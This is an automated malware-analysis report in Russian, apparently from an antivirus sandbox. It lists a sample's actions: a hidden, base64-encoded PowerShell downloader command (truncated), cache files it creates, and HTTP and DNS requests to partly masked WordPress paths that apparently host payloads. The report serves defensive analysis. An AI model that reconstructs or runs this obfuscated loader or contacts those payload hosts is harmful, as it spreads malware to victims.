Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAE0AUgBPAE8AegBnAG0APQAnAEsATABOAEQAVgBkAG0AZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAEkAVABZAHAAcgBgAE8AdABPAGMAbwBMACIAIAA9AC...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Сетевая активность
TCP
Запросы HTTP GET
- http://te###civil.com/wp-content/wvr/
- http://sc####agazines.com/wp-content/uploads/2020/sEsCvKF/
- http://be###ads.com/wp-admin/PbgJVpz/
- http://si###batam.com/cgi-bin/5yq6g129/
UDP
- DNS ASK sa###time.com
- DNS ASK te###civil.com
- DNS ASK sc####agazines.com
- DNS ASK be###ads.com
- DNS ASK si###batam.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAE0AUgBPAE8AegBnAG0APQAnAEsATABOAEQAVgBkAG0AZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAGAAVQBSAEkAVABZAHAAcgBgAE8AdABPAGMAbwBMACIAIAA9AC...' (со скрытым окном)
